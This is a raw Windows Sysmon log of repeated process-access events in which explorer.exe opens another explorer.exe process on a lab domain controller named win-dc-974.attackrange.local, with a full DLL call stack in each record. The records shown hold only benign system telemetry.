16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244883Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244882Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244881Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244880Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244879Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244878Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244877Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244876Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244875Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244874Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244873Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244872Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244871Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244870Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244869Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244868Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244867Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244866Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244865Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244864Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244863Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244862Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244861Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244860Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244859Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244858Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244857Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244856Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 